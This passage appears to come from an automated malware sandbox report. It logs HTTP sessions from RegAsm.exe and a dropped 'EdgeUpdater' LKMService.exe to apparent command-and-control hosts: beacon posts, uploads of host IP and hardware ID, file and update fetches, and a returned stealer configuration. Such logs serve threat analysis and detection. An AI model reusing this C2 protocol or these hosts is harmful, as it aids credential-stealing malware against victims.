                                                                                                                                                                                                                                          2024-10-02 12:43:21 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:21 GMT
                                                                                                                                                                                                                                          Content-Length: 34879
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: sessionid=58805f5d091578928e173a05; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                          2024-10-02 12:43:21 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                          2024-10-02 12:43:21 UTC16384INData Raw: 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34
                                                                                                                                                                                                                                          Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
                                                                                                                                                                                                                                          2024-10-02 12:43:21 UTC3768INData Raw: 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72
                                                                                                                                                                                                                                          Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
                                                                                                                                                                                                                                          2024-10-02 12:43:21 UTC213INData Raw: 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                          Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          7192.168.2.658521172.67.208.1414436904C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:21 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: questionsmw.store
                                                                                                                                                                                                                                          2024-10-02 12:43:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:43:22 UTC778INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:22 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=mldgnle88bshifg3fmppmp0p3h; expires=Sun, 26 Jan 2025 06:30:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7WDRjAYMA2eN9Its5c%2BwVvRYI7fWQVc%2FOcnu5EWAYxs%2BKBnIfVS1r7EX3Gksw9Ft37ybMoT9dm%2FS7Iue%2Bq1XdhGV6lHdPnjyKZ9jbyfiDAkhpOstikl8yP1puLzb8AKlPi2V6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c713fe8d8c63-EWR
                                                                                                                                                                                                                                          2024-10-02 12:43:22 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:43:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          8192.168.2.658523172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:22 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:43:22 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:43:22 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:43:23 UTC617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:22 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YYd%2BkGlvD%2F71Ii3rbN0O%2Bcpwy6%2FHP%2BD1DsViWiGV7Jrs63DHnmWTRL4r5JClK%2BWdJIoLLGS8ZaUUWv2wTl%2F5TlF9tcyImz12sQANEw%2FFd9dLFhKYONiGGxtesnxwVJpcVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c719ce41423f-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          9192.168.2.658524188.114.97.34436904C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:22 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: soldiefieop.site
                                                                                                                                                                                                                                          2024-10-02 12:43:22 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:43:23 UTC794INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:23 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=hpjvii5i9d0a1dllcggubj867g; expires=Sun, 26 Jan 2025 06:30:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vVAN8BVvA%2F3owFX8Q8wcUAyRcKOBsIUWZ58zK5ZsuXQTZN7eH7OoBci9qmOiXtp3gR7qsF9JNLgyJBQE9f0W0CjTCtftu93gky%2BkvylxoCcT6FhXyVU63ZWeeaaXlUncZI9v"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c71b79037c8d-EWR
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          2024-10-02 12:43:23 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:43:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          10192.168.2.65852249.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:22 UTC184OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:23 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          11192.168.2.658525172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:23 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:43:23 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:43:23 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:43:24 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:24 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wWbIh5EXF3m4QpAK4gVkdECn6M1ikZ80cn9%2B81w099biqXO2RmHKsfHURJ2FDU3cDDAnJ8rO%2FIEumzMeHBIHdzA6Xfu98juuq3X49%2B%2BgVo8iCy6UvcA5QkMFihUoK2UYFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c7215bb00f7d-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          12192.168.2.658526104.21.56.1504436904C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:23 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: abnomalrkmu.site
                                                                                                                                                                                                                                          2024-10-02 12:43:23 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:43:24 UTC778INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:24 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=g33adk0ttb743pb78dfan9kptl; expires=Sun, 26 Jan 2025 06:30:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xt%2BjC6z%2BsDP3%2BK0QIxH%2BUcRuaMpDtFA0suk6Ei3BoF8SWaOzR2EViq%2FsNLqB%2BfO2wAk%2Ffne07isPhIkcNpluA8IP5PP83KXrnS%2F6ywQ8Am5VHvkPqeTkqxzjvFjJnILPifb%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c72198b343b8-EWR
                                                                                                                                                                                                                                          2024-10-02 12:43:24 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:43:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          13192.168.2.65852749.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:24 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----AAKEGDAKEHJDHIDHJJDA
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 256
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:24 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 30 38 43 39 33 43 36 34 34 33 33 34 33 30 33 37 33 35 33 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 2d 2d 0d
                                                                                                                                                                                                                                          Data Ascii: ------AAKEGDAKEHJDHIDHJJDAContent-Disposition: form-data; name="hwid"7C08C93C64433430373531-a33c7340-61ca------AAKEGDAKEHJDHIDHJJDAContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------AAKEGDAKEHJDHIDHJJDA--
                                                                                                                                                                                                                                          2024-10-02 12:43:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:24 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:24 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 3a1|1|1|1|3b4edf816ad3f3cea996e5aa9b301ca0|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          14192.168.2.658529172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:24 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:43:24 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:43:24 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:43:25 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:24 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2B%2B7fyg9qiJtbydD09e3a39gI%2BOGvYnXSy7KDMYb%2B7NFvDX2CHfNn1BImd6Sc2nzcFJ0YNqoWs2XAkDQM%2FaNAg6GsZK5QtYqiRyq1SctAP9BTPEkuVDiE0Sll%2FiDZlLo%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c72739ed1760-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          15192.168.2.658530172.67.184.1964436904C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:24 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: treatynreit.site
                                                                                                                                                                                                                                          2024-10-02 12:43:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:43:25 UTC794INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:25 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=g6ueclt93irj6mljjpd5rotv4t; expires=Sun, 26 Jan 2025 06:30:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
